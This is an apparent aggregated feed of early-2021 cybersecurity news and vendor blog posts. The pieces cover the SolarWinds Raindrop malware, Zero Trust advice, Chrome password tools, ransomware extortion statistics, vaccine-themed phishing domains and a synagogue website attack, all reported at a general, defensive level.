Cisco Talos Incident Response (CTIR) provides a full suite of proactive and emergency services to help you prepare, respond and recover from a breach. CTIR enables 24-hour emergency response capabilities and direct access to Cisco Talos, the world’s largest threat intelligence and research group.

Cisco Talos Intelligence Group is one of the largest commercial threat intelligence teams in the world, comprised of world-class researchers, analysts and engineers. These teams are supported by unrivaled telemetry and sophisticated systems to create accurate, rapid and actionable threat intelligence for Cisco customers, products and services. Talos defends Cisco customers against known and emerging threats, discovers new vulnerabilities in common software, and interdicts threats in the wild before they can further harm the internet at large. Talos maintains the official rule sets of Snort.org, ClamAV, and SpamCop, in addition to releasing many open-source research and analysis tools.

Raindrop, a fourth malware employed in SolarWinds attacks

The threat actors behind the SolarWinds attack used malware dubbed Raindrop for lateral movement and deploying additional payloads.

Security experts from Symantec revealed that threat actors behind the SolarWinds supply chain attack leveraged a malware named Raindrop for lateral movement and deploying additional payloads.

Raindrop is the fourth malware that was discovered investigating the SolarWinds attack after the SUNSPOT backdoor, the Sunburst/Solorigate backdoor and the Teardrop tool. 

Raindrop (Backdoor.Raindrop) is a loader that was used by attackers to deliver a Cobalt Strike payload. Raindrop is similar to the Teardrop tool, but while the latter was delivered by the initial Sunburst backdoor, the former was used for spreading across the victim’s network. 

“Symantec has seen no evidence to date of Raindrop being delivered directly by Sunburst. Instead, it appears elsewhere on networks where at least one computer has already been compromised by Sunburst.” reads a blog post published by Symantec.

Symantec investigated four Raindrop infections until today, the malware was employed in the last phases of the attacks against a very few selected targets.

raindrop

Both Raindrop and Teardrop are used to deploy Cobalt Strike Beacon, but they use different packers and different Cobalt Strike configurations.

“To date, Symantec has seen four samples of Raindrop. In three cases, Cobalt Strike was configured to use HTTPS as a communication protocol. In the fourth it was configured to use SMB Named Pipe as a communication protocol.” continues the post.

“All three Raindrop samples using HTTPS communication follow very similar configuration patterns as previously seen in one Teardrop sample.”

In the following tables there are key differences between the two tools:

TEARDROPRAINDROP
PAYLOAD FORMATCustom, reusing features from PE format. It may be possible to reuse the packer with a range of different payloads supplied as PE DLLs with automatic conversion.Shellcode only.
PAYLOAD EMBEDDINGBinary blob in data section.Steganography, stored at pre-determined locations within the machine code.
PAYLOAD ENCRYPTIONvisualDecrypt combined with XOR using long key.AES layer before decompression; separate XOR layer using one byte key after decompression.
PAYLOAD COMPRESSIONNone.LZMA.
OBFUSCATIONReading JPEG file. Inserted blocks of junk code, some could be generated using a polymorphic engine.Non-functional code to delay execution.
EXPORT NAMESExport names vary, in some cases names overlapping with Tcl/Tk projects.Export names overlap with Tcl/Tk projects.
STOLEN CODEByte-copy of machine code from pre-existing third-party components. The original code is distributed in compiled format only.Recompiled third-party source code.

The report published by Symantec includes IoCs and Yara Rules.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, SolarWinds)

The post Raindrop, a fourth malware employed in SolarWinds attacks appeared first on Security Affairs.

Using Zero Trust principles to protect against sophisticated attacks like Solorigate

The Solorigate supply chain attack has captured the focus of the world over the last month. This attack was simultaneously sophisticated and ordinary. The actor demonstrated sophistication in the breadth of tactics used to penetrate, expand across, and persist in affected infrastructure, but many of the tactics, techniques, and procedures (TTPs) were individually ordinary.

Companies operating with a Zero Trust mentality across their entire environment are more resilient, consistent, and responsive to new attacks—Solorigate is no different. As threats increase in sophistication, Zero Trust matters more than ever, but gaps in the application of the principles—such as unprotected devices, weak passwords, and gaps in multi-factor authentication (MFA) coverage can be exploited by actors.

Zero Trust Principles

Applying Zero Trust

Zero Trust in practical terms is a transition from implicit trust—assuming that everything inside a corporate network is safe—to the model that assumes breach and explicitly verifies the security status of identity, endpoint, network, and other resources based on all available signals and data. It relies on contextual real-time policy enforcement to achieve least privileged access and minimize risks. Automation and Machine Learning are used to enable rapid detection, prevention, and remediation of attacks using behavior analytics and large datasets.

Zero Trust Policy

Verify explicitly

To verify explicitly means we should examine all pertinent aspects of access requests instead of assuming trust based on a weak assurance like network location. Examine the identity, endpoint, network, and resource then apply threat intelligence and analytics to assess the context of each access request.

When we look at how attackers compromised identity environments with Solorigate, there were three major vectors: compromised user accounts, compromised vendor accounts, and compromised vendor software. In each of these cases, we can clearly see where the attacker exploited gaps in explicit verification.

  • Where user accounts were compromised, known techniques like password spray, phishing, or malware were used to compromise user credentials and gave the attacker critical access to the customer network. On-premises identity systems are more vulnerable to these common attacks because they lack cloud-powered protections like password protection, recent advances in password spray detection, or enhanced AI for account compromise prevention.
  • Again, in cases where the actor succeeded, highly privileged vendor accounts lacked protections such as MFA, IP range restrictions, device compliance, or access reviews. In other cases, user accounts designated for use with vendor software were configured without MFA or policy restrictions. Vendor accounts should be configured and managed with the same rigor as used for the accounts which belong to the organization.
  • Even in the worst case of SAML token forgery, excessive user permissions and missing device and network policy restrictions allowed the attacks to progress. The first principle of Zero Trust is to verify explicitly—be sure you extend this verification to all access requests, even those from vendors and especially those from on-premises environments.

Cloud identity, like Azure Active Directory (Azure AD), is simpler and safer than federating with on-premises identity. Not only is it easier to maintain (fewer moving parts for attackers to exploit), your Zero Trust policy should be informed by cloud intelligence. Our ability to reason over more than eight trillion signals a day across the Microsoft estate coupled with advanced analytics allows for the detection of anomalies that are very subtle and only detectable in very large data sets. User history, organization history, threat intelligence, and real-time observations are an essential mechanism in a modern defense strategy. Enhance this signal with endpoint health and compliance, device compliance policies, app protection policies, session monitoring, and control, and resource sensitivity to get to a Zero Trust verification posture.

For customers that use federation services today, we continue to develop tools to simplify migration to Azure AD. Start by discovering the apps that you have and analyzing migration work using Azure AD Connect health and activity reports.

Least privileged access

Zero Trust: Microsoft Step by Step

Least privileged access helps ensure that permissions are only granted to meet specific business goals from the appropriate environment and on appropriate devices. This minimizes the attacker’s opportunities for lateral movement by granting access in the appropriate security context and after applying the correct controls—including strong authentication, session limitations, or human approvals and processes. The goal is to compartmentalize attacks by limiting how much any compromised resource (user, device, or network) can access others in the environment.

With Solorigate, the attackers took advantage of broad role assignments, permissions that exceeded role requirements, and in some cases abandoned accounts and applications which should have had no permissions at all. Conversely, customers with good least-privileged access policies such as using Privileged Access Workstations (PAW) devices were able to protect key resources even in the face of initial network access by the attackers.

Assume breach

Our final principle is to Assume Breach, building our processes and systems assuming that a breach has already happened or soon will. This means using redundant security mechanisms, collecting system telemetry, using it to detect anomalies, and wherever possible, connecting that insight to automation to allow you to prevent, respond and remediate in near-real-time.

Sophisticated analysis of anomalies in customer environments was key to detecting this complex attack. Customers that used rich cloud analytics and automation capabilities, such as those provided in Microsoft 365 Defender, were able to rapidly assess attacker behavior and begin their eviction and remediation procedures.

Importantly, organizations such as Microsoft who do not model “security through obscurity” but instead model as though the attacker is already observing them are able to have more confidence that mitigations are already in place because threat models assume attacker intrusions.

Summary and recommendations

It bears repeating that Solorigate is a truly significant and advanced attack. However ultimately, the attacker techniques observed in this incident can be significantly reduced in risk or mitigated by the application of known security best practices. For organizations—including Microsoft—thorough application of a Zero Trust security model provided meaningful protection against even this advanced attacker.

To apply the lessons from the Solorigate attack and the principles of Zero Trust that can help protect and defend, get started with these recommendations:

  1. More than any other single step, enable MFA to reduce account compromise probability by more than 99.9 percent. This is so important, we made Azure AD MFA free for any Microsoft customer using a subscription of a commercial online service.
  2. Configure for Zero Trust using our Zero Trust Deployment Guides.
  3. Look at our Identity workbook for Solorigate.

Stay safe out there.

Alex Weinert

For more information about Microsoft Zero Trust please visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Using Zero Trust principles to protect against sophisticated attacks like Solorigate appeared first on Microsoft Security.

The Connected Lives of Babies: Protecting First Footprints in the Digital World, Part 1

Digital from birth

The Connected Lives of Babies: Protecting The First Footprints in the Digital World, Part One

A baby can leave their first footprints internet even before they’re born.

The fact is that children start creating an identity online before they even put a little pinky on a device, let alone come home for the first time. That “Hello, world!” moment can come much, much sooner. And it will come from you.

From posting baby’s ultrasound pic to sharing a video of the gender reveal celebration, these are the first digital footprints that your child will make. With your help, of course, because it’s you who’ll snap all those photos, capture all those videos, and share many of them on the internet. Yet even though you’re the one who took them, those digital footprints you’ve created belong to your child.

And that’s something for us to pause and consider during this wonderful (and challenging!) stretch of early parenthood. Just as we look out for our children’s well-being in every other aspect of their little lives, we must look out for their digital well-being too. Babies are entitled to privacy too. And their little digital lives need to be protected as well.

The connected lives of babies

Babies lives are more connected than you might think. Above and beyond the social media posts we make to commemorate all their “firsts,” from first solid food to first steps, there’s digital information that’s associated with your child as well. Things like Social Security Numbers, medical records, and even financial records related to them all exist, all of which need to be protected just like we protect that same digital information as adults.

Likewise, there’s all manner of connected devices like Wi-Fi baby monitors, baby sleep monitors, even smart cribs that sense restlessness in your baby and then rocks and soothes those little cares away. Or how about a smart changing table that tracks the weight of your child over time? You and your baby may make use of those. And because all these things are connected, they have to be protected.

This is the first of two articles that takes a look at this topic, and we’ll start with a look at making good choice about purchasing “smart devices” and connected baby monitors—each pieces of technology that parents should investigate before bringing them into their home or nursery.

Buying smart devices for baby, Part One: Connect with your care provider

As a new parent, or as a parent who’s just added another tyke to the nest, you’ll know just how many products are designed for your baby—and then marketed toward your fears or concerns. Before buying such smart devices, read reviews and speak with your health care provider to get the facts.

For example, you can purchase connected monitors that track metrics like baby’s breathing, heart rate, and blood-oxygen levels while they sleep. While they’re often presented as a means of providing peace of mind, the question to ask is what that biometric information can really do for you. This is where your health care provider can come in, because if you have concerns about Sudden Infant Death Syndrome (SIDS), that’s a much larger conversation. Your provider can discuss the topic with you about and whether such a device is an effective measure for your child.

Buying smart devices for baby, Part Two: Do your security research

Another question to ask is what’s done with the biometric data that such devices monitor. Is it kept on your smartphone, or is it stored in the cloud by the device manufacturer? Is that storage secure? Is the data shared with any third parties? Who owns that data? Can you opt in or opt out of sharing it? Can you access and delete it as needed? Your baby’s biometrics are highly personal info and must be protected as such. Without clear-cut answers about how your baby’s data is handled, you should consider giving that device a hard pass.

How do you get those answers? This is another instance where you’ll have to roll up your sleeves and read the privacy policy associated with the device or service in question. And as it is with privacy policies, some are written far more clearly and concisely than others. The information is in there. You may have to dig for it. (Of note, there are instances where parents consented to the use of their data for the purposes of government research, such as this study published by the U.S. National Institutes of Health.)

Related, here’s the advice I share on every connected “smart” device out there, from baby-related items to smart refrigerators: before you purchase, read up on reviews and comments from other customers. Look for news articles about the device manufacturer too. The fact of the matter is that some smart device manufacturers are much better at baking security protocols into their devices than others, so investigate their track record to see if you can uncover any issues with their products or security practices. Information such as this can help you make an even more informed choice.

Secure your Wi-Fi baby monitor (and other smart devices too)

An online search for “hacked baby monitor” will quickly call up several unsettling stories about hackers tuning into Wi-Fi baby monitors—scanning the camera about the room at will and perhaps even speaking directly to the child. Often, this is because the default factory password has not been changed by the parents. And a “default password” may as well be “public password” because lists of default passwords for connected devices are freely available on the internet. In fact, researchers from Ben Gurion University looked at the basic security of off-the-shelf smart devices found that, “It only took 30 minutes to find passwords for most of the devices and some of them were found only through a Google search of the brand.”

The three things you can do to prevent this from happening to your Wi-Fi baby monitor, along with other connected devices around your home, are:

  1. Change the default password. Use a strong and unique password for your baby monitor and other devices.
  2. Update. Check regularly for device updates, as they often harden the security of the device in addition to adding performance upgrades.
  • Use two-factor authentication if available. This, in addition to a password, offers an extra layer of protection that makes a device far more difficult to hack.

What about “old-style” baby monitors that work on a radio frequency (RF) like a walkie-talkie does? Given that they’re not connected to the internet, there’s less risk involved. That’s because hacking into an RF monitor requires a per person to be in close physical proximity to the device and have access to the same broadcast frequency as your device—a far less likely proposition, yet a risk none the less. Some modern RF baby monitors even encrypt the radio signal, mitigating that much more risk.

And now, let’s talk about online privacy for babies and children

Next up, we’ll take a closer look at baby’s privacy online. Yes, that’s a thing! And an important one at that, as taking charge of their privacy right now can protect them from cybercrime and harm as they get older.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post The Connected Lives of Babies: Protecting First Footprints in the Digital World, Part 1 appeared first on McAfee Blogs.

New Year, new password protections in Chrome

Passwords help protect our online information, which is why it’s never been more important to keep them safe. But when we’re juggling dozens (if not hundreds!) of passwords across various websites—from shopping, to entertainment to personal finance—it feels like there’s always a new account to set up or manage. While it’s definitely a best practice to have a strong, unique password for each account, it can be really difficult to remember them all—that’s why we have a password manager in Chrome to back you up.

As you browse the web, on your phone, computer or tablet, Chrome can create, store and fill in your passwords with a single click. We'll warn you if your passwords have been compromised after logging in to sites, and you can always check for yourself in Chrome Settings. As we kick off the New Year, we’re excited to announce new updates that will give you even greater control over your passwords:

Easily fix weak passwords

We’ve all had moments where we’ve rushed to set up a new login, choosing a simple “name-of-your-pet” password to get set up quickly. However, weak passwords expose you to security risks and should be avoided. In Chrome 88, you can now complete a simple check to identify any weak passwords and take action easily.

To check your passwords, click on the key icon under your profile image, or type chrome://settings/passwords in your address bar.

Edit your passwords in one place

Chrome can already prompt you to update your saved passwords when you log in to websites. However, you may want to update multiple usernames and passwords easily, in one convenient place. That’s why starting in Chrome 88, you can manage all of your passwords even faster and easier in Chrome Settings on desktop and iOS (Chrome’s Android app will be getting this feature soon, too).

Building on the 2020 improvements

These new updates come on top of many improvements from last year which have all contributed to your online safety and make browsing the web even easier:

  • Password breaches remain a critical concern online. So we’re proud to share that Chrome’s Safety Check is used 14 million times every week! As a result of Safety Check and other improvements launched in 2020, we’ve seen a 37% reduction in compromised credentials stored in Chrome.
  • Starting last September, iOS users were able to autofilll their saved passwords in other apps and browsers. Today, Chrome is streamlining 3 million sign-ins across iOS apps every week! We also made password filling more secure for Chrome on iOS users by adding biometric authentication (coming soon to Chrome on Android).
  • We’re always looking for ways to improve the user experience, so we made the password manager easier to use on Android with features like Touch-to-fill.

The new features with Chrome 88 will be rolled out over the coming weeks, so take advantage of the new updates to keep your passwords secure. Stay tuned for more great password features throughout 2021.

Microsoft Taking Additional Steps to Address Zerologon Flaw

Company Will Enforce Domain Controller Settings to Block Connections
Microsoft is alerting customers that starting Feb. 9, it will enforce domain controller settings within Active Directory to block connections that could exploit the unpatched Zerologon vulnerability in Windows Server. Microsoft has been warning about the urgency of patching the flaw for months.

OpenWRT Project Community Investigating Data Breach

Open-Source Development Project Asking Members to Reset Passwords
OpenWRT, an open-source project that develops operating systems, firmware and other software for connected and embedded devices, is investigating a data breach after a hacker gained access to an administrator account and apparently was able to access usernames and email addresses for community members.

Security is everyone’s priority

By Dana Mitchell, Director, Cybersecurity Solutions Group, Microsoft Canada Digital transformation, cloud computing and a sophisticated threat landscape are forcing everyone to rethink the roles that each individual within an organization has in defending against cyber threats. With billions of people around the globe working from home, changes to the daily practice of cybersecurity are…

The post Security is everyone’s priority first appeared on IT World Canada.

MAZE Exfiltration Tactic Widely Adopted

MAZE Exfiltration Tactic Widely Adopted

New research by New Zealand company Emsisoft has found that a cyber-blackmail tactic first debuted by ransomware gang MAZE has been adopted by over a dozen other criminal cyber-gangs.

The internationally renowned security software company declared a ransomware crisis in the last month of 2019. Their latest ransomware report shows that this particular type of malware has had a huge impact on the United States in 2020.

Emsisoft threat analyst Brett Callow described the numbers in "The State of Ransomware in the US: Report and Statistics 2020" as "pretty grim."

At least 2,354 US governments, healthcare facilities, and schools were impacted by ransomware last year, including 113 federal, state, and municipal governments and agencies, 560 healthcare facilities, and 1,681 schools, colleges, and universities.

Researchers noted that the attacks "caused significant, and sometimes life-threatening, disruption: ambulances carrying emergency patients had to be redirected, cancer treatments were delayed, lab test results were inaccessible, hospital employees were furloughed and 911 services were interrupted."

In 2020, MAZE became the first ransomware group to be observed exfiltrating data from its victims and using the threat of publication as additional leverage to extort payment. 

"At the beginning of 2020, only the Maze group used this tactic," wrote researchers. "By the end of the year, at least 17 others had adopted it and were publishing stolen data on so-called leak sites."

According to a November report by Coveware, some ransomware gangs that exfiltrate data don't delete it, even after receiving a ransom from their victims. Coveware observed REvil (Sodinokibi) asking for a second ransom payment for stolen data it had already been paid to erase. 

Netwalker (Mailto) and Mespinoza (Pysa) were observed publishing exfiltrated data on dedicated leak-site portals despite receiving ransoms from their victims. 

Emsisoft found that in 2019 and in 2020, the same number of federal, state, county, and municipal governments and agencies were impacted by ransomware (113). 

"Of the 60 incidents that occurred in Q1 and Q2, data was stolen and released in only one case; it was, however, stolen and released in 23 of the 53 incidents that occurred in Q3 and Q4," they wrote.

New Charges Derail COVID Release for Hacker Who Aided ISIS

A hacker serving a 20-year sentence for stealing personal data on 1,300 U.S. military and government employees and giving it to an Islamic State hacker group in 2015 has been charged once again with fraud and identity theft. The new charges have derailed plans to deport him under compassionate release because of the COVID-19 pandemic.

Ardit Ferizi, a 25-year-old citizen of Kosovo, was slated to be sent home earlier this month after a federal judge signed an order commuting his sentence to time served. The release was granted in part due to Ferizi’s 2018 diagnosis if asthma, as well as a COVID outbreak at the facility where he was housed in 2020.

But while Ferizi was in quarantine awaiting deportation the Justice Department unsealed new charges against him, saying he’d conspired from prison with associates on the outside to access stolen data and launder the bitcoin proceeds of his previous crimes.

In the years leading up to his arrest, Ferizi was the administrator of a cybercrime forum called Pentagon Crew. He also served as the leader of an ethnic Albanian group of hackers from Kosovo known as Kosova Hacker’s Security (KHS), which focused on compromising government and private websites in Israel, Serbia, Greece, Ukraine and the United States.

The Pentagon Crew forum founded by Ferizi.

In December 2015, Ferizi was apprehended in Malaysia and extradited to the United States. In January 2016, Ferizi pleaded guilty to providing material support to a terrorist group and to unauthorized access. He admitted to hacking a U.S.-based e-commerce company, stealing personal and financial data on 1,300 government employees, and providing the data to an Islamic State hacking group.

Ferizi give the purloined data to Junaid “Trick” Hussain, a 21-year-old hacker and recruiter for ISIS who published it in August 2015 as part of a directive that ISIS supporters kill the named U.S. military members and government employees. Later that month, Hussain was reportedly killed by a drone strike in Syria.

The government says Ferizi and his associates made money by hacking PayPal and other financial accounts, and through pornography sites he allegedly set up mainly to steal personal and financial data from visitors.

Junaid Hussain’s Twitter profile photo.

Between 2015 and 2019, Ferizi was imprisoned at a facility in Illinois that housed several other notable convicts. For example, prosecutors allege that Ferizi was an associate of Mahmud “Red” Abouhalima, who was serving a 240 year sentence at the prison for his role in the 1993 World Trade Center bombing.

Another inmate incarcerated at the same facility was Shawn Bridges, a former U.S. Secret Service agent serving almost eight years for stealing $820,000 worth of bitcoin from online drug dealers while investigating the hidden underground website Silk Road. Prosecutors say Ferizi and Bridges discussed ways to hide their bitcoin.

The information about Ferizi’s inmate friends came via a tip from another convict, who told the FBI that Ferizi was allegedly using his access to the prison’s email system to share email and bitcoin account passwords with family members back home.

The Justice Department said subpoenas served on Ferizi’s email accounts and interviews with his associates show Ferizi’s brother in Kosovo used the information to “liquidate the proceeds of Ferizi’s previous criminal hacking activities.”

[Side note: It may be little more than a coincidence, but my PayPal account was hacked in Dec. 2015 by criminals who social engineered PayPal employees over the phone into changing my password and bypassing multi-factor authentication. The hackers attempted to send my balance to an account tied to Hussain, but the transfer never went through.]

Ferizi is being tried in California, but has not yet had an initial appearance in court. He’s charged with one count of aggravated identity theft and one count of wire fraud. If convicted of wire fraud, he faces a maximum penalty of 20 years in prison and a fine of $250,000. If convicted of aggravated identity theft, he faces a mandatory penalty of 2 years in prison in addition to the punishment imposed for a wire fraud conviction.

Cloud Mailbox Defense: End Users Share the Product Highlights Driving Their Success

This blog was written & authored by Rob Tappenden, Technical Marketing Engineering Leader at Cisco

Simplicity. This was the key fundamental principle of Cloud Mailbox Defense that we introduced in our earlier blogs. So how did the first customers and partners to try Cloud Mailbox Defense (CMD) think we did? “We have tested dozens of solutions. Cloud Mailbox Defense is the first solution that is ‘as easy as it claims to be’. There are no hidden architecture requirements, no additional configuration step and no misleading claims” said Anthony Gates, EVP/GM Rhino Networks.

In case you are not familiar with Cloud Mailbox Defense (I’d encourage you to read through some of my earlier blogs) this is our new supplementary security solution that allows you to take command of your Microsoft 365 mailboxes. It’s a cloud native solution focus on three core principles.

Cloud Mailbox Defense capabilities

Now simplicity may be the cornerstone of Cloud Mailbox Defense, but can a security product be too simple to be effective? After all, as more and more email moves to the cloud, some Gartner clients “report dissatisfaction with natively available capabilities” of their cloud email providers. That’s why it’s critical to blend this simplicity with 20 years of email security experience and the power of Cisco’s Talos threat intelligence, to give you a secure outcome you can see across all of your messages in your Microsoft 365 domain. To validate this, we have been running approximately three quarters of a million customer and partner emails through our solution per day to allow them to tell us whether we have realized our principles.

Their verdict?

Just like simplicity, once again we’ve delivered. According to Craig Ouzounian from Chevron Corporation, “You get a full picture, that east-west visibility that we don’t have today.” This comprehensive visibility is combined with the power of Cloud Mailbox Defense’s cloud native search and triage. Brian Kang from SecurView stated, ‘I don’t even bother to run a message trace in Microsoft, I just do it right here [in CMD]’. CMD’s value isn’t only in its ability to provide additional security context, it also reduces administrative overhead.” Harry Singh from VOX Network Solutions highlighted that, “The speed and ease of use, compared with the Microsoft one, is a huge improvement. If I go into the Microsoft Advanced Threat Protection search, it takes forever. I use PowerShell because the search is so slow, it’s work. I can’t just do it on the ATP side.”

Visibility. Simplicity. Integration. Delivered on Microsoft 365 email. We said it and we meant it. That’s the Cisco Mailbox Defense reality.

Naturally we’re thrilled about the feedback we’re receiving from our customers and partners, but rest assured we’re not done. Cloud email expectations and the threat landscape continues to evolve at a phenomenal pace. Cloud Mailbox Defense has an exciting roadmap ahead of it, leveraging the power of the SecureX platform and the whole Cisco Secure portfolio to be the premier Cloud Email Supplementary Security product of choice for your needs today and the future.

Start your free 30-day trial of Cloud Mailbox Defense today and check out www.cisco.com/go/cmd and the At-A-Glance for more details about Cloud Mailbox Defense.

Suspicious Vaccine-Related Domains Triple

Suspicious Vaccine-Related Domains Triple

The number of suspicious domains that feature the word "vaccine" in their title increased by almost 100% in the month after the first Pfizer COVID-19 vaccine was given outside of a clinical trial.

British grandmother Margaret Keenan became the first person in the world to receive the vaccine on December 8, 2020, a week before her 91st birthday. 

New research by American cybersecurity software company Webroot observed that December 8 through January 6, there was an 94.8% increase in suspicious domain names using "vaccine" compared with the previous 30 days.

When compared with the month of March 2020, the total use of the word "vaccine" within suspicious domain names between December and January 6 was found to have increased by 336%.

“As 2021 brings the first mass vaccination programs to fight COVID-19, we’re already seeing cybercriminals exploiting the publicity and anticipation surrounding these to target businesses and consumers in phishing and domain spoofing attacks," said Nick Emanuel, senior director of product at Webroot.

"Scams using keywords based on emotive subjects concerning medical safety and the pandemic are always going to be more effective, especially when they’re in the public interest."

Webroot’s Real-Time Anti-Phishing protection system detected a rise in malicious URLs using other words related to the pandemic.

Over 4,500 new suspicious domains were found, which contained a combination of words relating to "COVID-19," "Corona," "Vaccine," "Cure COVID," and others.

The word "vaccine" was specifically included in the title of 934 domains, while misspellings of "vaccine" cropped up in 611 more. 

"COVID" was in the title of 2,295 suspicious domains, and "Test" or "Testing" appeared in the title of 622 domains.

Threat actors also appeared to be using public interest in travel restrictions as a phishing lure. Among the suspicious domain titles flagged by researchers were "COVID Validator," "Testing Update," "COVID Travelcard," and "Private Vaccine."

"For individuals, defending against these kinds of attacks should involve security awareness training and remaining vigilant in scrutinising the types of emails they receive," said Emanuel. 

"This should also be underpinned by cybersecurity technology such as email filtering, anti-virus protection, and strong password policies.”

Retail and Hospitality Sector Has Impressive Fix Rate, but Room to Improve

Over the past year, the retail and hospitality industries have been forced to adapt to the ???new normal.??? Since lockdowns and health concerns have prevented or dissuaded in-person shopping or dining, the new normal has been e-commerce. Smaller businesses not equipped for the increase in e-commerce have had to undergo rapid digital transformation in order to stay afloat. But, unfortunately, e-commerce was not the only thing to increase in 2020. Cyberattackers have been taking advantage of the influx of digital activity.

This is especially concerning because, according to our recent State of Software Security (SOSS) report, 76 percent of applications in the retail and hospitality sector have a security vulnerability and 26 percent have high-severity security vulnerabilities.

But, on a positive note, our SOSS findings also revealed that when compared to other industries, retail and hospitality have the second-best fix rate and the best median time to remediate security flaws. This means that even though the industries might have a higher than usual number of flaws, they are quick to act and remediate those flaws. As Chris Eng, Chief Research Officer at Veracode explains, ???If retailers are constantly having to push out code containing business logic to support new promotions, that might account for the fix times.???

Retail and hospitality

The SOSS report also examined how the ???nature??? of applications and how we ???nurture??? them contribute to the time it takes to close out a security flaw. We found that the ???nature??? of applications ??? like organization or application size, application age, or flaw density ??? can affect how long it takes to remediate a security flaw. But, taking steps to ???nurture??? the security of applications ??? like using multiple application security (AppSec) testing types, scanning frequently and steadily, and utilizing APIs ??? can also influence how long it takes to remediate security flaws.

For the retail and hospitality industries, we found that they have a low flaw density relative to other sectors, but the applications tend to be old and larger. We also found that the sector is not consistently using DevSecOps best practices like scanning frequently in an automated way. If developers start following the best practices regularly, the retail and hospitality industries can remediate flaws and chip away at security debt faster.

Retail and hospitality nature vs nurture chart

Flaws that the retail and hospitality sector should keep a close eye on include encapsulation, SQL injection, and credential management issues. These flaw types seem to be more prevalent in the retail and hospitality sector compared to other industries, and they can lead to a serious breach. In fact, injection flaws are considered by OWASP Top 10 to be the number one, most critical security risk to web applications.

For more information on software security trends in the retail and hospitality industries, check out The State of Software Security Industry Snapshot.

ツ?

Atlanta Synagogue Reports Cyber-Attack

Atlanta Synagogue Reports Cyber-Attack

An annual religious service held in Atlanta in honor of Martin Luther King Jr. Day was disrupted by a cyber-attack. 

Threat actors reportedly targeted a Shabbat service that was being broadcast live over the internet from Atlanta synagogue The Temple on January 15. The attack occurred as US Senator-elect Raphael Warnock, the pastor at Martin Luther King Jr.’s historic Ebenezer Baptist Church in Atlanta, was delivering a sermon.

People attempting to watch the service live via the Temple's website were unable to access it, according to a letter penned by the synagogue's president, Kent Alexander.

Writing to the congregation on Saturday, Alexander said: “To the many of you who tried to log on through the Temple website but could not, and missed the service, we apologize and want to offer an explanation.

“Our website service provider informed our executive director, Mark Jacobson, last night that ‘malicious user agents’ had continuously loaded the Temple website with the objective of shutting it down.” 

Alexander did not name the service provider but added that he had been told that the attack was the "largest-ever attack affecting the provider's network of client synagogues" and that websites across the United States had also been blocked.

"Eventually, access was restored for all, but The Temple was last," the director wrote. "Our site was down for over an hour into the service."

The incident is currently under investigation by the authorities. Alexander theorized that the attack was inspired by religious and racial bigotry.  

After highlighting that Warnock will soon become Georgia's first African American senator, Alexander wrote: "Presumably, The Temple was singled out by a racist and anti-Semitic group or individual bent on silencing our joint Temple-Ebenezer Baptist Church MLK Jr. Shabbat."

The Temple was founded in 1867 and is located in the city's midtown. An annual Martin Luther King Jr. Day Shabbat service has been hosted there for over a decade. 

In 1958, the Temple's north entrance was bombed by the "Confederate Underground" in an incident denounced by then President Dwight Eisenhower. The bomb, made using 50 sticks of dynamite, caused damage valued at $750k today.

Researchers flag fourth piece of malware seen in SolarWinds hack and detail how Microsoft 365 got exploited

Two security vendors issued more details about the SolarWinds hack and abuse of its Orion network management platform.

Symantec says the list of malware pieces that could be delivered to victims of the SolarWinds Orion supply chain hack has grown to four. It found the new malware, a backdoor which it dubs Raindrop, was used against a select number of victims that were of interest to the attackers.

Raindrop is a loader that delivers a payload of the Cobalt Strike threat emulation software often used by infosec teams for penetration tests. It joins other malware used by the attackers, including the initial backdoor called Sunburst/Soloriagate and back another door later deposited called Teardrop. The malware used to get into the SolarWinds network is called Sunspot.

Raindrop, Symantec says, is very similar to Teardrop. But while the initial Sunburst backdoor delivered teardrop, Raindrop appears to be used for spreading across the victim’s network. The security firm also notes that its seen no evidence of Raindrop being delivered directly by Sunburst to date. Instead, it appears elsewhere on networks where Sunburst has already compromised at least one computer.

The attack by a threat group FireEye calls UNC2452 — believed by the U.S. to be of Russian origin — compromised updates downloaded by some 18,000 users of the Orion network management platform between March and August 2020. SolarWinds has evidence that the attack on its update mechanism started as early as the fall of 2019.

FireEye today also issued a report saying that the UNC2452 group used its access to on-premises networks to access victims’ Microsoft 365 environment during certain attacks. In addition to issuing a detailed paper describing these attacks and how to harden Microsoft environments, FireEye released a free tool on GitHub named Azure AD Investigator. The tool is meant to help organizations determine if the SolarWinds hackers got into Microsoft 365.

In its report, Symantec describes how Raindrop was used against one victim. In early July 2020, Sunburst was installed through the SolarWinds Orion update, compromising two computers. The following day, Teardrop was added to one of them.  That computer was found to have an Active Directory query tool and a credential dumper designed specifically for Orion databases. The credential dumper was similar to, but not the same as, the open-source Solarflare tool.

Eleven days later, on a third victim computer in the organization, where no previous malicious activity had been observed, a copy of the previously unseen Raindrop was installed under the name bproxy.dll. This computer was running computer access and management software. The attackers could have used this software to access any of the computers in the compromised organization.

One hour later, the Raindrop malware installed an additional file called “7z.dll”. Symantec was unable to retrieve this file because, within hours, a legitimate version of 7zip was used to extract a copy of what appeared to be Directory Services Internals (DSInternals) onto the computer. DSInternals is a legitimate tool that can be used for querying Active Directory servers and retrieving data, typically passwords, keys, or password hashes.

A pattern emerges

A second victim organization seen by Symantec had the Raindrop loader in late May. Several days later, PowerShell commands were executed on that computer, attempting to execute further instances of Raindrop on additional computers in the organization.

In a third victim, Symantec says Raindrop was used to install a version of Cobalt Strike that didn’t have an HTTP-based command and control server. Instead, it was rather configured to use a network pipe over Windows SMB (Server Message Block) protocol. Symantec theorizes the victim’s computer did not have direct access to the internet, so command and control was routed through another computer on the local network. Otherwise, the three Raindrop samples seen by Symantec used HTTPS communication.

The report outlines how UNC2452 and other threat actors moved laterally to the Microsoft 365 cloud using a combination of four primary techniques:

  1. Steal the Active Directory Federation Services (AD FS) token-signing certificate and use it to forge tokens for arbitrary users (sometimes described as Golden SAML). This would allow the attacker to authenticate into a federated resource provider (such as Microsoft 365) as any user, without the need for that user’s password or their corresponding multi-factor authentication (MFA) mechanism.
  2. Modify or add trusted domains in Azure AD to add a new federated Identity Provider (IdP) that the attacker controls. This would allow the attacker to forge tokens for arbitrary users and has been described as an Azure AD backdoor.
